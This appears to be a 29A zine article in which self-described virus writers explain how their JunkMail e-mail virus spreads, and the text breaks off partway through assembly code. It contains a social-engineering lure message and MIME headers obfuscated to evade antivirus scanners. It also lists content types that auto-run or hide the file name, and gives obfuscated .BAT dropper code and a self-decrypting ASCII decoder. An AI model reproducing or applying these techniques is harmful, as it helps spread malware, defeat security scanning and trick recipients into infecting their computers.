📄 29a-7.009
字号:
The Ins and Outs of JunkMail
roy g biv / defjam
RT Fishel / defjam
-= defjam =-
since 1992
bringing you the viruses of tomorrow
today!
About the authors:
roy g biv: former DOS/Win16 virus writer, author of several virus families,
including Ginger (see Coderz #1 zine for terrible buggy example, contact me
for better sources ;), and Virus Bulletin 9/95 for a description of what they
called Rainbow. Co-author of world's first virus using circular partition
trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS
swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the
rest is swapped out). Author of world's first virus using Thread Local
Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but
they call it Chiton), world's first virus using Visual Basic 5/6 language
extensions for replication (OU812), world's first Native executable virus
(Chthon), and world's first virus using process co-operation to prevent
termination (Gemini). Author of various retrovirus articles (eg see Vlad #7
for the strings that make your code invisible to TBScan). Went to sleep for a
number of years. This is my sixth virus for Win32. It is the world's first
virus using polymorphic SMTP headers.
I'm also available for joining a group. Just in case anyone is interested. ;)
RT Fishel: I don't write virus, I write code for people to use in their virus.
JunkMail brings to you some new techniques for e-mail speading. If you read
RFC 822 carefully, you will see a description about comments that are allowed
to appear in headers. These comments must be enclosed in () characters and
can contain any characters in the ISO-8859-1 character set. If you use these
comments to obfuscate the MIME headers, then you might bypass some AV e-mail
scanners. :)
Here is an example JunkMail e-mail before obfuscation:
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=WIFVHABY
--WIFVHABY
I received this file from you yesterday evening.
I think it was sent without you knowing by the Aliz virus.
The filename was changed but it looked like an important video inside.
You should look at this file to see what it is.
The attachment might open automatically. This is normal behaviour.
If you see a prompt to Open or Save the email then choose Open.
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp
--WIFVHABY
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<IFRAME SRC=3DCID:EMAIL WIDTH=3D0>
--WIFVHABY
Content-Type: audio/x-ms-wax;
name=email.com
Content-Transfer-Encoding: base64
Content-ID: <EMAIL>
[base64 encoded file]
--WIFVHABY
--
Here is an example JunkMail e-mail after obfuscation:
MIMe-vERSioN: 1(*T).0
COntEnT-TyPe: (<!)mU(3)l(/)TIp(*)aRT(!)/M(;)i(^)X(eCz)E(/`x)d;
(,#?)Bo(8l)uN(_)Da(*F)Ry=WIFVHABY
XXEMEDWSIUKZTCJYCBTCRRBYFLUICTWOURLFJDDRB
EIQFPJJEAHOGZWSZYFPEXNSOSBDJNHURTQTRRIBLUPYXIPFWBXJNBOQVLSMJ
GJHZF
KKTKYGEHWHUZTXWBGKDFCIJBCMGBZBFEDMVLYDURSRTXNOXGLJYTGVEPW
GFVEVLCJ
WIFVHABY--
--WIFVHABY
I received this file from you yesterday evening.
I think it was sent without you knowing by the Aliz virus.
The filename was changed but it looked like an important video inside.
You should look at this file to see what it is.
The attachment might open automatically. This is normal behaviour.
If you see a prompt to Open or Save the email then choose Open.
If the attachment is blocked by Outlook 2002 then see
http://support.microsoft.com/support/kb/articles/q290/4/97.asp
--WIFVHABY
coNTent-TYPE: (6{)t(=`)e(x-1)xt(bU)/hT(w)ML
coNtEnT-TRANSFEr-ENCoDING: Qu(ZYT)OT(0&y)E(DBZ)d(a)-(_)PRi(p9Q)N(|N)TaBlE
=3CIF=52A=4DE =53RC=3D=43I=44=3A=45MAIL =57=49=44T=48=3D=30=3E
--WIFVHABY
ConTeNt-TYpe: (~S)A(I8t)U(w)D(y:,)Io/(JP)x-M(,)s-w(J)A(+)X(8);
(')Nam(|lz)E(oJ_)=(M#g)e(NO>)m(J)a(6U)il(b#).c(lp')o(Eh)M
ConTenT-tRaNSFER-eNCoDiNG: bA(@h)se(*)64
coNtENt-iD: <(wFe)EM(gq6)ai(*)L>
[base64 encoded file]
--WIFVHABY
OIALNKVLKBDYHURLTQQGRACSXCSGLWKJVSDROSQBJOXYMYAFRFQJGKA
VBJLPEZQDTRVIXV
AHAVZF
ABCAYMKUVCZERXGK
MCKSRAHQVCJVFYZJGTRUHRJQXPNUWJRRJCRTGCOFCRWNRNKYGAXT
NEWUHSRTHFEIWGHMMELC
PQJQLUYEBRTOPMMUEIZYEXAITLRBJOTVLMFZIZTUTSVILGZQQSKODLBCIKW
VADMWVJEXMGWEPAJIVBEXBQQESSCWMQVSUZXVOMLGATIUKIJCCZRZZQSF
FPGMSXAG
--
Wow! :)
So this is our first step, but it is not enough for us. We want to do more.
After some research, we found all of the MIME Content Types that can run
automatically. There is not just audio/x-wav, you know? Here are they:
application/x-mplayer2
audio/aiff
audio/mid
audio/midi
audio/mpeg
audio/x-mid
audio/x-midi
audio/x-mpegurl
audio/x-ms-wax
audio/x-ms-wma
audio/x-wav
midi/mid
video/msvideo
video/quicktime
video/x-ivf
video/x-mpeg
video/x-mpeg2a
video/x-ms-asf
video/x-ms-asf-plugin
video/x-ms-wm
video/x-ms-wmv
video/x-ms-wvx
Then with more research, we found another thing: Content Types that display
the CID instead of the filename! The user will see a prompt this time, but
if the CID has a not-suspicious name, then the user might let it run. It
seems that no-one knew about this. Here are they:
application/futuresplash
application/hta
application/x-shockwave-flash
text/x-scriptlet
We use EMAIL for CID, so user opens e-mail then sees prompt to open EMAIL. :)
And still not enough for us. We also use random choice of file content (not
only the extension). We can choose between a .BAT file, a Windows executable
file, and a OLE2 scrap file.
The .BAT file drops a executable ASCII .COM file that contains a new base64
decoder algorithm that does not need any character dictionary. Here is
description of that by RT Fishel:
The .BAT file dropper had to be compatible with RFC 1521 mail, it had to be
compatible with .BAT files for all Windows versions, and it had to be
compatible with ISO 8859 (0x20-0x7e only) to avoid troubles with DBCS
codepages. RFC 1521 mail has a maximum line length of 76 characters (not
including CRLF) and no = (0x3d) characters unless at end of line or encoded as
uppercase octet (=3D). Long lines are continued by ending line with =
character and .BAT files must not contain any of these characters: " (0x22
(NT/2000/XP)), & (0x26), < (0x3c), > (0x3e), | (0x7c). Also, % (0x25) must be
%% (all platforms) and ^ (0x5e) must be ^^ under NT/2000/XP. All of these
conditions made it very difficult to write. :)
So we begin:
@ECHO OFF no screen output
SET %R=^^^^ must default to NT/2000/XP (result is %R%=^^)
IF NOT %OS%T==T GOTO F OS is defined for NT/2000/XP so we skip next line
SET %R=^ because this line executes correctly only under 9x/Me
:F
but for sure we obfuscate that code, too. Here is an example of that:
@EC=48O =4FFF
=53=45=54 %=52=3D^^=5E^
I=46 NO=54 %O=53%=54=3D=3DT =47O=54=4F =46
SE=54 =25R=3D=5E
:=46
--
Then we initialise the decryptor (this is executable ASCII code):
pop ax ax = 0
push ax return address (-> int 20h)
dec ax ax = ffffh
aaa ax = 105h
xor al, (offset b64_outer + 1 - 105h) and 0ffh
push ax
pop si si -> encrypted buffer
xor ax, (offset b64_outer + 1) xor '00'
ah = '0' (8-bit decryption key)
push ax
pop bp bp = '00' (16-bit decryption key)
and decrypt the decoder:
sub [si + 21], ah decrypt push (76 shr 2) + 1
sub [si + 27], ah decrypt je b64_newline
sub [si + 29], si + sub [si + 29], ah
decrypt lods dword ptr [esi]
sub [si + 2b], ah decrypt push 4
sub [si + 2e], si + sub [si + 2f], si
decrypt rol eax, 8
sub [si + 30], bp decrypt cmp al, '0'
sub [si + 34], bp decrypt jnb b64_testchar
sub [si + 36], si decrypt add al, (('/' shl 2) + 1) and 0ffh
sub [si + 37], si + sub [si + 38], si
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -